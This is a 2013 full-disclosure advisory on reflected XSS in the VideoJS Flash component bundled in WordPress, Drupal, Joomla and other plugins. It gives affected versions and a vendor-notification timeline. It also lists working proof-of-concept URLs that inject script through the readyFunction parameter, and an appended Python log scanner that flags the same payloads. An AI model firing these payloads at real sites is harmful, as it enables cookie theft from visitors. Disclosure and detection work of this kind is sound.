Message-ID: <00c801ce4c2d$f4698b40$9b7a6fd5@pc>
Date: Wed, 8 May 2013 23:52:12 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Vulnerabilities in multiple web applications with
	VideoJS

Hello list!

These are Cross-Site Scripting vulnerabilities in multiple web applications 
with VideoJS. Earlier I wrote about vulnerabilities in VideoJS 
(http://seclists.org/fulldisclosure/2013/May/21). This is a popular video 
and audio player, which is used on hundreds of thousands of web sites and in 
multiple web applications.

Among them are VideoJS - HTML5 Video Player for WordPress, Video.js for 
Drupal, bo:VideoJS for Joomla, videojs-youtube, Telemeta (CMS), and a lot of 
other web applications. All developers of these applications, as well as 
developers of all other web applications with VideoJS, need to update it in 
their software.

-------------------------
Affected products:
-------------------------

Web applications which are using VideoJS Flash Component 3.0.2 and previous 
versions are vulnerable. VideoJS Flash Component version 3.0.2 is not 
vulnerable to the mentioned XSS hole, except for XSS via JS callbacks (as 
can be read in the repository on GitHub). There are also bypass methods 
which work in the latest version, but the developers haven't fixed them due 
to their low impact. So update to the latest version of VideoJS.swf.

The following web applications are vulnerable:

VideoJS - HTML5 Video Player for WordPress 3.2.3 and previous versions.
Video.js for Drupal 6.x-2.2 and previous 6.x-2.x versions and 7.x-2.2 and 
previous 7.x-2.x versions (only these versions are using VideoJS Flash 
Component).
bo:VideoJS for Joomla 2.1.1 and previous versions (with VideoJS Flash 
Component).
videojs-youtube (all versions).
Telemeta 1.4.4 and previous versions.

All these developers were informed last week.

-------------------------
Affected vendors:
-------------------------

VideoJS and VideoJS Flash Component were developed by Zencoder.

Formerly Zencoder, now Brightcove
http://videojs.com

----------
Details:
----------

Cross-Site Scripting (WASC-08):

Original example for VideoJS:

http://site/video-js.swf?readyFunction=alert(document.cookie)

VideoJS - HTML5 Video Player for WordPress:

http://site/wp-content/plugins/videojs-html5-video-player-for-wordpress/videojs/video-js.swf?readyFunction=alert(document.cookie)

Video.js for Drupal:

http://site/sites/all/libraries/video-js/video-js.swf?readyFunction=alert(document.cookie)

bo:VideoJS for Joomla:

http://site/plugins/content/bo_videojs/video-js/video-js.swf?readyFunction=alert(document.cookie)

videojs-youtube:

http://site/lib/video-js.swf?readyFunction=alert(document.cookie)

Telemeta:

http://site/htdocs/video-js/video-js.swf?readyFunction=alert(document.cookie)

------------
Timeline:
------------ 

2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They 
thanked me and promised to fix it.
2013.02.23 - reminded VideoJS developers and asked for date of releasing the 
fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent previous letter to 
Zencoder's developers (since Brightcove, which acquired Zencoder, ignored 
the hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And 
made my own fix to force developers to fix the hole.
2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in 
source code on github.
2013.05.02 - developers compiled fixed version of swf (after my reminding) 
and uploaded to both repositories.
2013.05.02 - tested version 3.0.2 and found that developers haven't fixed 
the hole completely and informed them.
2013.05.03 - informed developers of VideoJS - HTML5 Video Player for 
WordPress.
2013.05.04 - informed developers of Video.js for Drupal, bo:VideoJS for 
Joomla, videojs-youtube, Telemeta. Along with sending a letter to the 
developer of bo:VideoJS, I also informed Joomla VEL. They moved this 
extension from JED to VEL.
2013.05.05 - since the developer of videojs-youtube had no e-mail in his 
github account and his e-mail mentioned at different web sites was no longer 
working, I published my letter on github.
2013.05.07 - Telemeta developers answered and thanked (the only one among 
these developers).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
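
Added example (not part of the original message): a log check for the 
request pattern shown under Details, flagging any request to a bundled 
video-js.swf that carries a readyFunction query parameter. The log lines are 
constructed, and treating a dotted JavaScript identifier as a plain callback 
name is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Common Log Format: client first, then the quoted "METHOD target PROTOCOL".
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a benign callback name is a dotted JavaScript identifier path.
IDENTIFIER_RE = re.compile(r'^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$')


def scan_access_log(lines):
    """Return (client, path, value, verdict) for each video-js.swf request
    that carries a readyFunction query parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/video-js.swf"):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() != "readyfunction":
                continue
            value = unquote(value)  # second pass catches double encoding
            verdict = ("callback-name" if IDENTIFIER_RE.match(value)
                       else "script-like")
            findings.append((client, url.path, value, verdict))
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/May/2013:10:00:01 +0300] "GET /lib/video-js.swf HTTP/1.1" 200 5120',
    '192.0.2.11 - - [08/May/2013:10:00:02 +0300] "GET /lib/video-js.swf?readyFunction=alert(document.cookie) HTTP/1.1" 200 5120',
    '192.0.2.12 - - [08/May/2013:10:00:03 +0300] "GET /sites/all/libraries/video-js/video-js.swf?readyFunction=alert%2528document.cookie%2529 HTTP/1.1" 200 5120',
    '192.0.2.13 - - [08/May/2013:10:00:04 +0300] "GET /htdocs/video-js/video-js.swf?readyFunction=player.onReady HTTP/1.1" 200 5120',
    '192.0.2.14 - - [08/May/2013:10:00:05 +0300] "GET /index.php?readyFunction=x() HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A "callback-name" hit is still worth reviewing, since the message states 
that XSS via JS callbacks remains possible in version 3.0.2.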

